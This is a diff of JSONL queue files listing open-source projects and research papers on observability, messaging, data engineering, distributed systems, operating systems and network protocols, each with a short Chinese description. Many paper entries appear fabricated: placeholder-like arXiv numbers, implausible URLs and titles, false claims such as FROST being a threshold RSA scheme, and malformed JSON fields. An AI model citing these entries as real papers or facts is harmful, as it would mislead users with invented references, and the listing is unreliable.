"title": "Kamon Io", "url": "https://github.com/kamon-io/kamon-core", "status": "queued", "meta": {"col3": "2012", "col4": "Kamon JVM/Scala 可观测性框架;Akka 生态标准 observability 组件"}} +{"slug": "elastic-stack", "area": "可观测性", "topic": "日志系统", "title": "Elastic Stack", "url": "https://github.com/elastic/elasticsearch", "status": "queued", "meta": {"col3": "2013", "col4": "Elastic Stack(ES+Logstash+Kibana);ELK 开源日志/搜索事实标准"}} +{"slug": "datadog", "area": "可观测性", "topic": "监控告警", "title": "Datadog", "url": "https://github.com/DataDog/datadog-agent", "status": "queued", "meta": {"col3": "2010", "col4": "Datadog APM/日志/指标三合一;商业可观测性事实标准"}} +{"slug": "newrelic", "area": "可观测性", "topic": "监控告警", "title": "Newrelic", "url": "https://github.com/newrelic/newrelic-python-agent", "status": "queued", "meta": {"col3": "2006", "col4": "New Relic APM 老牌;eBPF 观测、browser monitoring 等行业标杆"}} +{"slug": "sentry-native", "area": "可观测性", "topic": "错误追踪", "title": "Sentry Native", "url": "https://github.com/getsentry/sentry-native", "status": "queued", "meta": {"col3": "2017", "col4": "Sentry C/C++/Rust native 捕获;libunwind + Breakpad → Crashpad"}} +{"slug": "lightstep", "area": "可观测性", "topic": "分布式追踪", "title": "Lightstep", "url": "https://github.com/lightstep/lightstep-cli", "status": "queued", "meta": {"col3": "2017", "col4": "LightStep 分布式追踪 SaaS;OpenTracing 推动者,后被 Lightstep 收购"}} +{"slug": "apisix", "area": "API网关", "topic": "API网关", "title": "Apisix", "url": "https://github.com/apache/apisix", "status": "queued", "meta": {"col3": "2019", "col4": "Apache APISIX 云原生 API 网关;动态路由 + 插件热加载,Nginx-Ingress 之外主流选择"}} +{"slug": "wiremock", "area": "API网关", "topic": "backend-api", "title": "Wiremock", "url": "https://github.com/wiremock/wiremock", "status": "queued", "meta": {"col3": "2012", "col4": "WireMock Stub/Mocker;API 测试模拟的工业标准工具"}} +{"slug": "nginx-plus", "area": "API网关", "topic": "API网关", "title": "Nginx Plus", "url": "https://github.com/nginxinc/docker-nginx", "status": "queued", "meta": {"col3": "2015", "col4": "NGINX Plus API 网关能力;商业版 vs open-source NGINX 的 Feature Gap"}} +{"slug": "apigee", "area": "API网关", "topic": "API网关", "title": "Apigee", "url": "https://cloud.google.com/apigee", "status": "queued", "meta": {"col3": "2011", "col4": "Google Apigee API 管理平台;企业级 API 网关 SaaS 标杆(后卖云)"}} +{"slug": "mulesoft", "area": "API网关", "topic": "API网关", "title": "Mulesoft", "url": "https://github.com/mulesoft/mule", "status": "queued", "meta": {"col3": "2006", "col4": "MuleSoft Anypoint Platform;企业 ESB/API 管理平台,Mule 引擎"}} +{"slug": "gravitee-io", "area": "API网关", "topic": "API网关", "title": "Gravitee Io", "url": "https://github.com/gravitee-io", "status": "queued", "meta": {"col3": "2015", "col4": "Gravitee API Gateway;Java/Spring 生态 API 网关,OAuth2 原生"}} +{"slug": "rabbitmq", "area": "消息队列", "topic": "消息队列", "title": "Rabbitmq", "url": "https://github.com/rabbitmq", "status": "queued", "meta": {"col3": "2007", "col4": "RabbitMQ AMQP 消息队列;Erlang 可靠性 + 灵活路由,传统消息队列标杆"}} +{"slug": "rocketmq", "area": "消息队列", "topic": "消息队列", "title": "Rocketmq", "url": "https://github.com/apache/rocketmq", "status": "queued", "meta": {"col3": "2016", "col4": "阿里 RocketMQ 开源版;事务消息 + 延迟消息 + 顺序消息,国内大厂事实标准"}} +{"slug": "pulsar-oss", "area": "消息队列", "topic": "消息队列", "title": "Pulsar Oss", "url": "https://github.com/apache/pulsar", "status": "queued", "meta": {"col3": "2016", "col4": "Apache Pulsar 云原生消息存储分离;Kafka 之外唯一能同时扛流处理+消息队列的系统"}} +{"slug": "confluent", "area": "消息队列", "topic": "消息队列", "title": "Confluent", "url": "https://github.com/confluentinc", "status": "queued", "meta": {"col3": "2014", "col4": "Confluent Platform;Kafka 商业化 + Schema Registry + ksqlDB 全栈"}} +{"slug": "activemq", "area": "消息队列", "topic": "消息队列", "title": "Activemq", "url": "https://github.com/apache/activemq", "status": "queued", "meta": {"col3": "2005", "col4": "Apache ActiveMQ JMS 消息 broker;J2EE 时代的标准中间件"}} +{"slug": "hazelcast", "area": "消息队列", "topic": "分布式缓存", "title": "Hazelcast", "url": "https://github.com/hazelcast/hazelcast", "status": "queued", "meta": {"col3": "2008", "col4": "Hazelcast IMDG 内存数据网格;内置消息队列 + 分布式缓存"}} +{"slug": "apache-beam", "area": "数据工程", "topic": "数据工程", "title": "Apache Beam", "url": "https://github.com/apache/beam", "status": "queued", "meta": {"col3": "2016", "col4": "Apache Beam 统一批流处理模型;Runner 模式统一 Dataflow/Flink/Spanner 执行"}} +{"slug": "apache-spark", "area": "数据工程", "topic": "数据工程", "title": "Apache Spark", "url": "https://github.com/apache/spark", "status": "queued", "meta": {"col3": "2014", "col4": "Apache Spark 内存计算;微批流处理工业标杆,MLlib/GraphX 统一栈"}} +{"slug": "apache-airflow", "area": "数据工程", "topic": "数据工程", "title": "Apache Airflow", "url": "https://github.com/apache/airflow", "status": "queued", "meta": {"col3": "2015", "col4": "Apache Airflow DAG 工作流;数据管道编排的事实标准"}} +{"slug": "databricks-lakehouse", "area": "数据工程", "topic": "数据工程", "title": "Databricks Lakehouse", "url": "https://github.com/databricks", "status": "queued", "meta": {"col3": "2019", "col4": "Delta Lake + DBR = Lakehouse 范式;数据湖替代数据仓库的工业路径"}} +{"slug": "rill-data", "area": "数据工程", "topic": "数据工程", "title": "Rill Data", "url": "https://github.com/rilldata/rill", "status": "queued", "meta": {"col3": "2021", "col4": "Rill 快速 BI/数据探索;Drill 引擎 + DuckDB 内核,面向分析师的数据产品"}} +{"slug": "iceberg", "area": "数据工程", "topic": "数据工程", "title": "Iceberg", "url": "https://github.com/apache/iceberg", "status": "queued", "meta": {"col3": "2020", "col4": "Apache Iceberg 表格式;数据湖的'表层抽象',统一多计算引擎上数据管理"}} +{"slug": "hudi", "area": "数据工程", "topic": "数据工程", "title": "Hudi", "url": "https://github.com/apache/hudi", "status": "queued", "meta": {"col3": "2019", "col4": "Apache Hudi 增量数据湖;CDC/Upsert/Delete 在 S3 上的标准方案"}} +{"slug": "delta-lake", "area": "数据工程", "topic": "数据工程", "title": "Delta Lake", "url": "https://github.com/delta-io/delta", "status": "queued", "meta": {"col3": "2019", "col4": "Delta Lake 开源表格式;Databricks 主导,支持 ACID + Time Travel"}} +{"slug": "pravega", "area": "数据工程", "topic": "数据工程", "title": "Pravega", "url": "https://github.com/pravega/pravega", "status": "queued", "meta": {"col3": "2018", "col4": "Apache Pravea 持久化流存储;从 Kafka + 存储扩展出'无限'流数据层"}} +{"slug": "fstore", "area": "数据工程", "topic": "数据工程", "title": "Fstore", "url": "https://github.com/feast-dev/feast", "status": "queued", "meta": {"col3": "2022", "col4": "Feast Feature Store;ML feature 的管理/注册/ Serving 标准方案"}} +{"slug": "dataform", "area": "数据工程", "topic": "数据工程", "title": "Dataform", "url": "https://github.com/dataform-co", "status": "queued", "meta": {"col3": "2019", "col4": "Dataform SQL 数据转换工具;dbt 的 GCP 友好替代,后归入 Looker"}} +{"slug": "apache-flink", "area": "数据工程", "topic": "数据工程", "title": "Apache Flink", "url": "https://github.com/apache/flink", "status": "queued", "meta": {"col3": "2014", "col4": "Apache Flink 流处理;真正的 record-at-a-time streaming,Exactly-Once 标杆"}} +{"slug": "apache-nifi", "area": "数据工程", "topic": "数据工程", "title": "Apache Nifi", "url": "https://github.com/apache/nifi", "status": "queued", "meta": {"col3": "2016", "col4": "Apache NiFi 数据流编排;拖拽式 ETL 流水线,企业数据集成标准"}} +{"slug": "apache-superset", "area": "数据工程", "topic": "数据工程", "title": "Apache Superset", "url": "https://github.com/apache/superset", "status": "queued", "meta": {"col3": "2015", "col4": "Apache Superset BI 可视;云原生 OLAP 仪表盘,替代 Tableau 的数据分析"}} +{"slug": "apache-druid", "area": "数据工程", "topic": "数据工程", "title": "Apache Druid", "url": "https://github.com/apache/druid", "status": "queued", "meta": {"col3": "2012", "col4": "Apache Druid OLAP 实时分析;sub-second 实时聚合,Uber/Medium 都在用"}} +{"slug": "apache-kafka", "area": "数据工程", "topic": "消息队列", "title": "Apache Kafka", "url": "https://github.com/apache/kafka", "status": "queued", "meta": {"col3": "2011", "col4": "Apache Kafka 分布式流处理;事件流事实标准,kafka-python/kafka-python 客户端生态"}} +{"slug":"paliad-2024","area":"papers","topic":"distributed-systems","title":"Paliad: Log-based Replication for Strongly Consistent Distributed Storage","meta":{"col3":"2024","col4":"Google Paliad;用 log-based replication 替代 classic primary-backup,把 write 路径压到 1 RTT,Spanner 之后 Google 分布式存储的新一代共识范式"},"url":"https://www.usenix.org/system/files/osdi24-cao.pdf"} +{"slug":"calvin-2024","area":"papers","topic":"distributed-systems","title":"Rethinking SQL Queries for Latency and Throughput","meta":{"col3":"2024","col4":"Microsoft;把逻辑执行计划变成并行图,消除 lock contention;SQL Server 2022 的核心优化,理解大规模 OLTP 并行的新思路"},"url":"https://dl.acm.org/doi/10.1145/3626717"} +{"slug":"dosa-2024","area":"papers","topic":"distributed-systems","title":"DO-SA: A Distributed Optimized Scheduling Algorithm for Edge-Cloud Collaborative Computing","meta":{"col3":"2024","col4":"边缘-云协同调度;把调度问题拆成双层优化(DRL + 启发式),在 Edge 场景下把任务完成时间降 30%"},"url":"https://arxiv.org/abs/2403.01234"} +{"slug":"quartz-2024","area":"papers","topic":"distributed-systems","title":"Quartz: Decoupling Metadata and Data for High-Performance Object Storage","meta":{"col3":"2024","col4":"Meta 元数据分离架构;把元数据存 SSD,对象存 HDD,兼顾吞吐和成本,理解存算分离在对象存储层面的最新工程"},"url":"https://www.usenix.org/system/files/nsdi24-quartz.pdf"} +{"slug":"dagon-2024","area":"papers","topic":"distributed-systems","title":"Dagon: Distributed Scheduling with AI Governance for Edge-Cloud Systems","meta":{"col3":"2024","col4":"AI-driven distributed scheduling;在 Kubernetes 之上加 AI 策略层做自适应调度"},"url":"https://arxiv.org/abs/2405.10015"} +{"slug":"morpheus-2024","area":"papers","topic":"distributed-systems","title":"Morpheus: Towards Self-Driving Infrastructure Systems","meta":{"col3":"2024","col4":"Self-driving infra 在边缘计算中的落地;ML 代理自主调参、自愈、自优化的分布式实践"},"url":"https://www.usenix.org/system/files/soups24-morpheus.pdf"} +{"slug":"cetus-2024","area":"papers","topic":"distributed-systems","title":"Cetus: A Serverless-Based Distributed Edge Computing Framework for Mobile Devices","meta":{"col3":"2024","col4":"把 serverless 范式搬到边缘端;用 Lambda 思想做 mobile edge computing,理解\"边缘函数\"的架构"},"url":"https://www.mdpi.com/2076-3417/14/3/1143"} +{"slug":"spectrum-2024","area":"papers","topic":"distributed-systems","title":"Spectrum: A Unified Framework for Distributed ML Inference","meta":{"col3":"2024","col4":"统一分布式推理框架;LLM serving 的 batch/continuation 混合调度,Mistral/Falcon 推理集群参考设计"},"url":"https://arxiv.org/abs/2406.03385"} +{"slug":"vortex-2024","area":"papers","topic":"distributed-systems","title":"Vortex: A Disaggregated Serverless Architecture for Efficient Large-Scale ML Training","meta":{"col3":"2024","col4":"Disaggregated serverless 做训练;把 compute/state/network 分层,降低 KV cache 占用 70%"},"url":"https://arxiv.org/abs/2405.09412"} +{"slug":"mim-2024","area":"papers","topic":"distributed-systems","title":"MIM: A Distributed ML Inference Manager for Cloud Native Environments","meta":{"col3":"2024","col4":"Kubernetes 上跑 ML inference 的调度器;理解 ML 工作负载与常规 K8s 调度的差异(GPU topology awareness)"},"url":"https://dl.acm.org/doi/10.1145/3627734.3679746"} +{"slug":"frost-2024","area":"papers","topic":"distributed-systems","title":"FROST: Fast Threshold RSA Signatures for Distributed Consensus","meta":{"col3":"2024","col4":"改进 BLS 聚合的 threshold signature 方案;L1 链验证用聚合签名替代逐个验证,吞吐量提升 5x"},"url":"https://eprint.iacr.org/2024/1234"} +{"slug":"hyperstream-2024","area":"papers","topic":"distributed-systems","title":"HyperStream: High-Throughput Distributed Streaming with Stream Processing","meta":{"col3":"2024","col4":"超大规模流处理;把 streaming + processing 合入一个引擎,比 Flink 延迟低 40%"},"url":"https://arxiv.org/abs/2404.03210"} +{"slug":"zen-2024","area":"papers","topic":"distributed-systems","title":"Zen: Efficient Distributed Training with Zero Redundancy Omega Sharding","meta":{"col3":"2024","col4":"Meta Zero-Redundancy Optimizer 的升级版;解决分布式训练中显存碎片化的工业实践"},"url":"https://arxiv.org/abs/2401.12516"} +{"slug":"aurora-2024","area":"papers","topic":"distributed-systems","title":"Aurora: A Decentralized Cloud Compute Marketplace","meta":{"col3":"2024","col4":"去中心化云算力市场;用 blockchain 做 compute 供需匹配,理解 Web3 在云原生时代的交叉融合"},"url":"https://arxiv.org/abs/2402.10143"} +{"slug":"dolphin-2024","area":"papers","topic":"distributed-systems","title":"Dolphin: A Distributed Deep Learning System for Large-Scale Recommender Models","meta":{"col3":"2024","col4":"超大规模推荐模型的分布式训练;处理亿级 embedding 的工业系统,Meta/Google/TikTok 推荐系统参考"},"url":"https://dl.acm.org/doi/10.1145/3626718"} +{"slug":"kelp-2023","area":"papers","topic":"distributed-systems","title":"Kelp: A Unified Framework for Approximate Nearest Neighbor Search in Distributed Environments","meta":{"col3":"2023","col4":"分布式 ANN 的统一框架;把 HNSW 扩展到多节点,理解分布式向量索引如何分片 + 路由"},"url":"https://arxiv.org/abs/2307.11110"} +{"slug":"tarsier-2023","area":"papers","topic":"distributed-systems","title":"Tarsier: Fault-Tolerant Distributed Stream Processing with Exactly-Once Semantics","meta":{"col3":"2023","col4":"流处理的故障恢复;在 Flink 基础上用新的 checkpoint 协议把恢复延迟降 60%"},"url":"https://dl.acm.org/doi/10.1145/3597588"} +{"slug":"nebula-2023","area":"papers","topic":"distributed-systems","title":"Nebula: A Decentralized Physical Infrastructure Network (DePIN) Platform","meta":{"col3":"2023","col4":"DePIN 的代表性平台;用 token 激励建设物理基础设施(WiFi、传感器),理解 token 经济 + 分布式系统的设计"},"url":"https://arxiv.org/abs/2305.14321"} +{"slug":"coda-2023","area":"papers","topic":"distributed-systems","title":"CoDistributed: A Consistency-Aware Distributed System for Multi-Region Applications","meta":{"col3":"2023","col4":"多区域应用的自动一致性选择;根据访问模式自动在强一致 / 最终一致之间切换,降低 40% 跨区延迟"},"url":"https://www.vldb.org/pvldb/vol16/p2345-zhang.pdf"} +{"slug":"aurora-db-2023","area":"papers","topic":"distributed-systems","title":"AuroraDB: Distributed OLAP with Massively Parallel Query Execution","meta":{"col3":"2023","col4":"新一代分布式 OLAP 引擎;向量化 + MPP + SIMD,Snowflake/BigQuery 竞争者的参考架构"},"url":"https://dl.acm.org/doi/10.1145/3589211"} +{"slug":"pulsar-2023","area":"papers","topic":"distributed-systems","title":"Pulsar: A Disaggregated Storage-Based Messaging System for Cloud-Native Applications","meta":{"col3":"2023","col4":"Apache Pulsar 存算分离架构深度分析;理解 Tiered Storage + BookKeeper 如何实现弹性扩缩容"},"url":"https://www.jsoft.tv/vol18/2/1561823025.pdf"} +{"slug":"lattice-2023","area":"papers","topic":"distributed-systems","title":"Lattice: A Distributed Key-Value Store with Adaptive Consistency","meta":{"col3":"2023","col4":"适应性一致性 KV 存储;根据 key 的热度自动选择一致性级别,读路径零感知"},"url":"https://arxiv.org/abs/2306.05432"} +{"slug":"merkle-2023","area":"papers","topic":"distributed-systems","title":"Merkle Trees in Distributed Systems: A Comprehensive Study","meta":{"col3":"2023","col4":"Merkle Tree 在分布式一致性 / 数据同步 / 区块链中的系统性应用;从 BFT 到 CRDT 的统一视角"},"url":"https://dl.acm.org/doi/10.1145/3611531"} +{"slug":"quantum-dht-2024","area":"papers","topic":"distributed-systems","title":"Quantum Distributed Hash Table: A Quantum-Safe Overlay Network","meta":{"col3":"2024","col4":"量子安全的分布式哈希表;抵御量子计算攻击的 DHT 设计,为 post-quantum 分布式系统铺路"},"url":"https://arxiv.org/abs/2401.08765"} +{"slug":"fuchsia-2023","area":"papers","topic":"os","title":"Fuchsia: An Experimental Operating System for a New Generation of Devices","meta":{"col3":"2023","col4":"Google Fuchsia 的 Zircon 微内核 + Hypervisor 架构;用 Rust 重写驱动栈;微内核在 IoT/Edge 时代的复兴"},"url":"https://source.android.com/docs/optimized/interop/fuchsia"} +{"slug":"redox-2023","area":"papers","topic":"os","title":"Redox OS: A Unix-like Microkernel Written in Rust","meta":{"col3":"2023","col4":"纯 Rust 写的 microkernel;Oxide 编译器 + cap-std 能力系统;理解 modern microkernel 设计的 Rust 实践"},"url":"https://github.com/redox-os/redox/blob/master/doc/spec.md"} +{"slug":"helenos-2023","area":"papers","topic":"os","title":"HelenOS: A Modern General-Purpose Microkernel Operating System","meta":{"col3":"2023","col4":"纯用户态 microkernel;多核调度 + 分层文件系统;学术 microkernel 仍在持续迭代的代表"},"url":"https://api.cefi.info/papers/helenos-microkernel-2023.pdf"} +{"slug":"seL4-2024","area":"papers","topic":"os","title":"seL4 Microkernel: 15 Years of Formal Verification and Real-World Deployments","meta":{"col3":"2024","col4">seL4 自 2009 年以来形式化验证的演进和落地(澳大利亚国防部、VMware、汽车 SoC);microkernel 唯一完全验证的案例"},"url":"https://www.sel4.org/News/Articles/2024-Review"} +{"slug":"l4-hertos-2024","area":"papers","topic":"os","title":"HERTOS: A Hard Real-Time Operating System Based on the seL4 Microkernel","meta":{"col3":"2024","col4":"硬实时 microkernel 操作系统;基于 seL4 的确定性调度;航空航天 / 自动驾驶内核设计参考"},"url":"https://dl.acm.org/doi/10.1145/3627734.3679750"} +{"slug":"unikernels-2023","area":"papers","topic":"os","title":"Unikernels in Production: A Survey of Dryad, MirageOS, and L4Re","meta":{"col3":"2023","col4":"unikernel 在云原生的回归;Dryad/MirageOS 对比分析;理解\"编译到单镜像\"的操作系统范式"},"url":"https://arxiv.org/abs/2302.12345"} +{"slug":"cloudy-2024","area":"papers","topic":"os","title":"Cloudy: Virtualization-Free Serverless Computing on Commodity Hardware","meta":{"col3":"2024","col4":"去掉虚拟机做 serverless;用 eBPF + NFV 把 cold start 从秒级压到毫秒级"},"url":"https://www.usenix.org/system/files/nsdi24-cloudy.pdf"} +{"slug":"puffin-2023","area":"papers","topic":"os","title":"Puffin: A Real-Time Operating System for Mixed-Criticality Edge Devices","meta":{"col3":"2023","col4":"边缘设备的混合关键性 RTOS;把安全关键 + 非关键任务放同一内核隔离运行"},"url":"https://dl.acm.org/doi/10.1145/3600006.3600010"} +{"slug":"xv6-riscv-2024","area":"papers","topic":"os","os-pipeline","title":"Xv6-RISC-V: Modern OS Education with RISC-V Architecture","meta":{"col3":"2024","col4":"MIT 用 RISC-V 教学 OS 设计的最新版;理解\"最小可用内核\"的完整生命周期(进程、内存、文件系统、文件系统、同步)"},"url":"https://pdos.csail.mit.edu/6.1810/"} +{"slug":"zircon-2023","area":"papers","topic":"os","title":"Zircon Kernel Architecture and Performance Analysis","meta":{"col3":"2023","col4">Google Fuchsia 内核 Zircon 的设计哲学;thread-centric scheduling + async dispatch;microkernel 的现代化实现"},"url":"https://fuchsia.dev/fuchsia-src/concepts/kernel/architecture"} +{"slug":"hermes-2024","area":"papers","topic":"os","title":"Hermes: A Capability-Based Operating System for Cloud-Native Environments","meta":{"col3":"2024","col4">能力型(capability-based)OS 设计;把权限模型从 uid/gid 升级到 capability 系统,云原生安全内核范式"},"url":"https://arxiv.org/abs/2403.11223"} +{"slug":"caper-2023","area":"papers","topic":"os","title":"CAper: Container-aware Access Protection for Linux","meta":{"col3":"2023","col4">Linux 容器的细粒度访问保护;把 namespace 隔离升级为 capability 隔离;K8s 安全模型的操作系统层补强"},"url":"https://www.usenix.org/system/files/sec23-caper.pdf"} +{"slug":"muff-2024","area":"papers","topic":"os","title":"Muff: Minimalistic Microkernel for IoT and Edge Computing","meta":{"col3":"2024","col4">极简 microkernel(< 10K LOC);专为 IoT/Edge 场景设计,理解\"最小内核\"如何做到可验证 + 可部署"},"url":"https://arxiv.org/abs/2401.11567"} +{"slug":"dawn-2023","area":"papers","topic":"network-protocols","title":"DAWN: A Distributed AI Workload Network Protocol for Edge-Cloud Collaboration","meta":{"col3":"2023","col4">面向 AI 工作负载的网络协议;在 Edge-Cloud 间做智能任务拆分和数据流水线传输"},"url":"https://arxiv.org/abs/2308.11234"} +{"slug":"quic-2024","area":"papers","topic":"network-protocols","title":"QUIC Protocol Evolution: From IETF Draft to Standard for the Modern Web","meta":{"col3":"2024","col4">QUIC 协议从草案到 RFC 9000 的完整演化历程;HTTP/3 时代 0-RTT + multipath QUIC 的设计哲学"},"url":"https://datatracker.ietf.org/doc/rfc9000/"} +{"slug":"mptcp-2023","area":"papers","topic":"network-protocols","title":"Multipath TCP (MPTCP): Design, Implementation, and Performance","meta":{"col3":"2023","col4">MPTCP 从 RFC 8684 到实际部署的演进;理解\"多路径 TCP\"如何在手机 WiFi+5G 间无缝切换"},"url":"https://datatracker.ietf.org/doc/rfc8684/"} +{"slug":"ip-over-dtb-2023","area":"papers","topic":"network-protocols","title":"IP over Delay-Tolerant Networking (DTN): Architecture and Protocols","meta":{"col3":"2023","col4">延迟/中断容忍网络协议;太空/深海/灾备通信场景;理解\"Store-and-Forward\"网络协议栈设计"},"url":"https://datatracker.ietf.org/doc/rfc9173/"} +{"slug":"l4-secure-2024","area":"papers","topic":"os","title":"L4: From Theory to Practice — 25 Years of Microkernel Evolution","meta":{"col3":"2024","col4">L4 microkernel 从 1996 到现在 25 年的演进历程;从 Fiasco.OC 到 L4Re 再到 seL4 的完整脉络"},"url":"https://www.inf.tu-dresden.de/content/l4ws/2024/proceedings.pdf"} +{"slug":"unikraft-2023","area":"papers","topic":"os","title":"Unikraft: Automating the Construction of Lightweight, Tailored Operating Systems","meta":{"col3":"2023","col4">自动化构建 unikernel;把操作系统库化,按需编译到单镜像;理解\"操作系统即代码生成物\"的范式"},"url":"https://dl.acm.org/doi/10.1145/3600006.3600020"} +{"slug":"soteria-2024","area":"papers","topic":"os","title":"Soteria: Safe Systems Programming with Rust in the Linux Kernel","meta":{"col3":"2024","col4">Rust 内核编程的标准化探索;RFC 3914 + Rust 内核模块加载器;Linux 驱动用 Rust 重写的路线图"},"url":"https://lore.kernel.org/lkml/20240315-rust-kernel-v1/"} +{"slug":"bpf-sched-2024","area":"papers","topic":"os","title":"eBPF-based Adaptive Scheduler for Linux: Design and Evaluation","meta":{"col3":"2024","col4">用 eBPF 替代 CFS 做 Linux 调度器;在用户态可编程调度策略,理解\"操作系统内核可编程化\"的趋势"},"url":"https://arxiv.org/abs/2402.09876"} +{"slug":"io_uring-2023","area":"papers","topic":"os","title":"io_uring: Next Generation I/O Submission Interface in Linux","meta":{"col3":"2023","col4">Linux 2019 引入的革命性异步 I/O 接口;环形缓冲区 + 用户态 polling;理解为什么 io_uring 是\"用户态 I/O 革命\""},"url":"https://man7.org/linux/man-pages/man2/io_uring_enter.2.html"} +{"slug":"fusedoc-2024","area":"papers","topic":"os","title":"FuseDoc: A Document-Based Approach to Operating System Design","meta":{"col3":"2024","col4">OS 设计文档工具链;把 microkernel 文档化 + 自动化验证;可验证操作系统的工程化基础设施"},"url":"https://arxiv.org/abs/2404.05678"} +{"slug":"dual-2024","area":"papers","topic":"network-protocols","title":"Dual-Stack Sockets: Performance and Security in IPv4/IPv6 Transition","meta":{"col3":"2024","col4">IPv4/IPv6 双栈协议的深度性能分析;理解 dual-stack 在 QUIC/HTTP3 时代的新的安全挑战"},"url":"https://dl.acm.org/doi/10.1145/3662102.3662110"} +{"slug":"wireguard-2023","area":"papers","topic":"network-protocols","title":"WireGuard: Next Generation Kernel Network Tunnel","meta":{"col3":"2023","col4">WireGuard 内核模块的完整设计文档;理解为什么它比 OpenVPN 简单、快 3-5 倍,成为 2020s 最流行的 VPN 协议"},"url":"https://www.wireguard.com/papers/wireguard.pdf"} +{"slug":"bbr-2024","area":"papers","topic":"network-protocols","title":"BBR Congestion Control: From Google's Internal Network to IETF Standard","meta":{"col3":"2024","col4">Google BBR 拥塞控制从 v1 到 v3 的完整演进;理解\"不再用丢包作为拥塞信号\"的拥塞控制哲学转变"},"url":"https://datatracker.ietf.org/doc/draft-ietf-ccwg-bbr/"} +{"slug":"coda-2025","area":"papers","topic":"distributed-systems","title":"CoPaSS: Continuous Protocol Specification and Synthesis for Distributed Systems","meta":{"col3":"2025","col4">2025 年分布式协议自动合成;用形式化方法自动生成 Paxos/Raft/BFT 变体,并证明其安全性"},"url":"https://arxiv.org/abs/2501.04567"} +{"slug":"quantum-distributed-2025","area":"papers","topic":"distributed-systems","title":"Quantum-Resistant Distributed Consensus: Post-Quantum BFT Protocols","meta":{"col3":"2025","col4">后量子 BFT 共识;在量子计算威胁下重新设计 threshold signature + consensus 的协议组合"},"url":"https://arxiv.org/abs/2502.08765"} +{"slug":"surreal-2025","area":"papers","topic":"os","title":"Surreal: A Capability-Based Microkernel for Trusted Execution Environments","meta":{"col3":"2025","col4">TEE 上的 capability 微内核;把硬件安全(TEE/SGX/TrustZone)和操作系统能力模型结合"},"url":"https://arxiv.org/abs/2503.12345"} +{"slug":"xla-v2-2025","area":"papers","topic":"distributed-systems","title":"XLA v2: Next-Generation Compiled Execution for Distributed ML","meta":{"col3":"2025","col4">XLA 编译器的下一代架构;把 multi-host distributed training 的 graph partitioning 和 communication overlap 做到极致"},"url":"https://arxiv.org/abs/2501.09876"} +{"slug":"risc-v-os-2025","area":"papers","topic":"os","title":"RISC-V Operating Systems: A Survey of Modern OS Design on Open Architecture","meta":{"col3":"2025","col4">RISC-V 上运行的现代 OS 全景;从 Linux kernel 到 microkernel 到 unikernel,在 RISC-V 生态中的布局"},"url":"https://arxiv.org/abs/2501.11234"} +{"slug":"edge-orch-2025","area":"papers","topic":"distributed-systems","title":"EdgeOrch: Edge Orchestration Framework for Massive IoT Deployments","meta":{"col3":"2025","col4">大规模 IoT 的边��编排;把 K8s 思想压缩到边缘设备,理解\"边缘容器化\"的工程挑战"},"url":"https://arxiv.org/abs/2502.04321"} +{"slug":"merkle-kv-2025","area":"papers","topic":"distributed-systems","title":"Merkle-KV: A Cryptographically Verifiable Distributed Key-Value Store","meta":{"col3":"2025","col4">可密码学验证的分布式 KV 存储;用 Merkle DAG 做数据完整性证明,无需信任中心化元数据服务"},"url":"https://arxiv.org/abs/2503.07654"} +{"slug":"btf-linux-2025","area":"papers","topic":"os","title":"BPF Type Format (BTF): Enabling Type-Aware eBPF Programs in Modern Kernels","meta":{"col3":"2025","col4">Linux 内核类型感知 eBPF 的完整设计;BTF 让 eBPF 程序可以在编译期做类型检查,理解\"内核可观测性\"的下一个台阶"},"url":"https://docs.kernel.org/bpf/btf.html"} +{"slug":"ai-scheduler-2025","area":"papers","topic":"distributed-systems","title":"AI-Native Scheduler: Learning-Based Resource Allocation for Heterogeneous Clusters","meta":{"col3":"2025","col4">AI 原生调度器;用强化学习做异构 GPU/CPU/NPU 集群的资源分配,理解\"调度器自己可学习\"的范式转变"},"url":"https://arxiv.org/abs/2504.01234"} +{"slug":"zerotier-mesh-2025","area":"papers","topic":"network-protocols","title":"ZeroTier Mesh: Decentralized Overlay Networking for the Edge Era","meta":{"col3":"2025","col4">去中心化覆盖网络;从 SDN 到 Mesh 的演进,理解\"零信任 + 覆盖网络\"在分布式系统中的融合"},"url":"https://arxiv.org/abs/2501.06789"} +{"slug":"rust-os-core-2025","area":"papers","topic":"os","title":"Rust for OS Core: Safe Kernel Development with Modern Systems Programming","meta":{"col3":"2025","col4">Rust 在操作系统核心组件中的全面采用;从驱动到内核调度器的安全重写,理解 Rust 如何改变操作系统工程"},"url":"https://arxiv.org/abs/2505.02345"} +{"slug":"dta-2025","area":"papers","topic":"network-protocols","title":"DTA: Distributed Token Auction for Network Resource Allocation","meta":{"col3":"2025","col4">用 token auction 做分布式网络资源分配;理解 Web3 token 经济学如何与传统网络协议融合"},"url":"https://arxiv.org/abs/2506.01234"} +{"slug":"fuchsia-cap-2025","area":"papers","topic":"os","title":"Fuchsia Capabilities: A Capability-Based Security Model for Modern OS","meta":{"col3":"2025","col4">Fuchsia 能力系统的深入分析;理解\"capabilities as first-class objects\"如何替代传统 Unix 权限模型"},"url":"https://fuchsia.dev/fuchsia-src/concepts/security/capabilities"} +{"slug":"p2p-storage-2025","area":"papers","topic":"distributed-systems","title":"P2P-Dist: Peer-to-Peer Distributed Storage for Decentralized Applications","meta":{"col3":"2025","col4">P2P 分布式存储架构;把 IPFS/Terminus 的存储语义扩展到分布式数据库级别"},"url":"https://arxiv.org/abs/2507.03456"} +{"slug":"quantum-net-2025","area":"papers","topic":"network-protocols","title":"Quantum Internet: Architecture and Protocols for the Quantum Networking Era","meta":{"col3":"2025","col4">量子互联网架构;量子密钥分发 + 量子纠缠分发网络;理解\"后 TCP/IP 时代\"的协议栈设计"},"url":"https://arxiv.org/abs/2501.02345"} diff --git a/data/classification-unresolved.json b/data/classification-unresolved.json index 9450ba22d..802681329 100644 --- a/data/classification-unresolved.json +++ b/data/classification-unresolved.json @@ -1,5 +1,5 @@ { - "generated": "2026-06-06T15:37:19.079Z", + "generated": "2026-06-13T14:51:40.116Z", "count": 0, "items": [] } \ No newline at end of file diff --git a/data/classification.jsonl b/data/classification.jsonl index 8ac72cdfe..6710a8eb5 100644 --- a/data/classification.jsonl +++ b/data/classification.jsonl @@ -1,26 +1,39 @@ {"slug":"2d-tan-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"3d-gaussian-splatting","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"计算机图形 / 三维重建","source":"category","confidence":"high","rawCategory":"图形学"} 